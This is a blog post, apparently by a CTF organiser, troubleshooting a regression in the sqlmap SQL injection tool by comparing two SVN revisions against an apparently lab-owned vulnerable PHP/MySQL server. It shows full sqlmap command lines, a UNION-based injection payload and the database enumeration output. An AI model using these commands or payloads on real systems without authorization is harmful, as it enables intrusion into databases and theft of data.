Well, I run with psymera a CTF game and we are constantly adding new VMWare machines and new tests just to keep on playing and not get bored. As part of a internal training where I work I started to create some videos on how to use SQLMap (I promise to upload here shortly in a big rant about it) so I started on what everyone does: update your version.
And something interesting happened, sqlmap enumeration broke (gorgeous) but it didn’t look much like it, it baffled me at first, so much that I had to do all by hand and asked psymera if he changed something, he said no.
So this is the info of the updated sqlmap version to that date:
- root@fsckOSX:/pentest/database/sqlmap# svn info
- Path: .
- URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap
- Repository Root: https://svn.sqlmap.org/sqlmap
- Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb
- Revision: 4380
- Node Kind: directory
- Schedule: normal
- Last Changed Author: stamparm
- Last Changed Rev: 4380
- Last Changed Date: 2011-09-19 12:08:08 -0700 (Mon, 19 Sep 2011)
the SVN rev is 4380, latest at Sep 19th, here is the example of a run against the vulnerable web server with this revision.
- root@fuckOSX:/pentest/database/sqlmap# ./sqlmap.py -u "http://XXX.XXX.XXX.XXX/index.php?page=search" --data="search=aaa" --dbs
- sqlmap/1.0-dev (r4380) - automatic SQL injection and database takeover tool
- http://www.sqlmap.org
- [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 14:26:22
- [14:26:22] [INFO] using '/pentest/database/sqlmap/output/XXX.XXX.XXX.XXX/session' as session file
- [14:26:22] [INFO] resuming injection data from session file
- [14:26:22] [INFO] resuming back-end DBMS 'mysql 4' from session file
- [14:26:22] [INFO] testing connection to the target url
- [14:26:23] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: search
- Type: UNION query
- Title: MySQL UNION query (NULL) - 1 column
- Payload: search=aaa' UNION ALL SELECT CONCAT(CHAR(58,107,98,119,58),CHAR(82,88,103,80,76,100,72,90,73,105),CHAR(58,116,99,109,58))# AND 'MXBu'='MXBu
- ---
- [14:26:23] [INFO] the back-end DBMS is MySQL
- web server operating system: Linux CentOS 4
- web application technology: PHP 4.3.9, Apache 2.0.52
- back-end DBMS: MySQL 4
- [14:26:23] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database
- [14:26:24] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fixing problems with some collation issues)
- [14:26:24] [WARNING] the SQL query provided does not return any output
- available databases [1]:
- [*]
- [14:26:24] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/XXX.XXX.XXX.XXX'
- [*] shutting down at 14:26:24
So note the
available databases [1]:
[*]
This is interesting, it FINDS the database apparently but there is no name for it. This is the part that had me baffled (obviously the table enumeration, the column enumeration failed as it didn’t know the database name)
So I started to update back, some versions (such as 4320) would even crash on run (this is normal as sqlmap is a very active project) so after a while i found the last revision that worked
- root@fuckOSX:/pentest/database/sqlmap# svn update -r 4319
- D _sqlmap.py
- U xml/payloads.xml
- U plugins/dbms/sybase/enumeration.py
- U plugins/generic/enumeration.py
- U sqlmap.conf
- U sqlmap.py
- U doc/FAQ.pdf
- U doc/README.html
- U doc/README.pdf
- U doc/THANKS
- U doc/README.sgml
- U lib/takeover/web.py
- U lib/takeover/metasploit.py
- U lib/utils/hash.py
- U lib/controller/checks.py
- U lib/controller/controller.py
- U lib/core/common.py
- U lib/core/threads.py
- U lib/core/agent.py
- U lib/core/settings.py
- U lib/core/dump.py
- U lib/core/defaults.py
- U lib/core/option.py
- U lib/core/optiondict.py
- U lib/request/connect.py
- U lib/request/comparison.py
- U lib/request/basic.py
- U lib/techniques/blind/inference.py
- U lib/techniques/union/use.py
- U lib/techniques/union/test.py
- U lib/techniques/error/use.py
- U lib/parse/cmdline.py
- D tamper/unmagicquotes.py
- Updated to revision 4319.
Notate how lib/techniques/ had some changes, but changes from latest revision to this one are more than that, so it’s a compromise for now.
So here is this revision against the same vulnerable web server.
- root@fsckOSX:/pentest/database/sqlmap# ./sqlmap.py -u "http://XXX.XXX.XXX.XXX/index.php?page=search" --data="search=aaa" --dbs
- sqlmap/1.0-dev (r4319) - automatic SQL injection and database takeover tool
- http://www.sqlmap.org
- [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 14:26:53
- [14:26:53] [INFO] using '/pentest/database/sqlmap/output/XXX.XXX.XXX.XXX/session' as session file
- [14:26:53] [INFO] resuming injection data from session file
- [14:26:53] [INFO] resuming back-end DBMS 'mysql 4' from session file
- [14:26:53] [INFO] testing connection to the target url
- [14:26:54] [WARNING] there is a DBMS error found in the HTTP response bodywhich could interfere with the results of the tests
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: POST
- Parameter: search
- Type: UNION query
- Title: MySQL UNION query (NULL) - 1 to 10 columns
- Payload: search=aaa' UNION ALL SELECT CONCAT(CHAR(58,107,98,119,58),CHAR(82,88,103,80,76,100,72,90,73,105),CHAR(58,116,99,109,58))# AND 'MXBu'='MXBu
- ---
- [14:26:54] [INFO] the back-end DBMS is MySQL
- web server operating system: Linux CentOS 4
- web application technology: PHP 4.3.9, Apache 2.0.52
- back-end DBMS: MySQL 4
- [14:26:54] [WARNING] information_schema not available, back-end DBMS is MySQL < 5. database names will be fetched from 'mysql' database
- [14:26:54] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fixing problems with some collation issues)
- [14:26:54] [WARNING] it was not possible to count the number of entries for the used SQL query. sqlmap will assume that it returns only one entry
- [14:26:56] [INFO] fetching number of databases
- [14:26:56] [ERROR] unable to retrieve the number of databases
- [14:26:56] [INFO] falling back to current database
- [14:26:56] [INFO] fetching current database
- [14:26:56] [INFO] read from file '/pentest/database/sqlmap/output/XXX.XXX.XXX.XXX/session': pwnetwork
- available databases [1]:
- [*] pwnetwork
- [14:26:56] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/XXX.XXX.XXX.XXX'
- [*] shutting down at 14:26:56
- root@fsckOSX:/pentest/database/sqlmap#
Here it is!!!
available databases [1]:
[*] pwnetwork
Just my 2 cents, this has been verified by other people and I hope if someone uses the tool and suddenly scratches his head can rollback to the working revision while sqlmap developers fix this (You guys are awesome keep the excellent work!!!)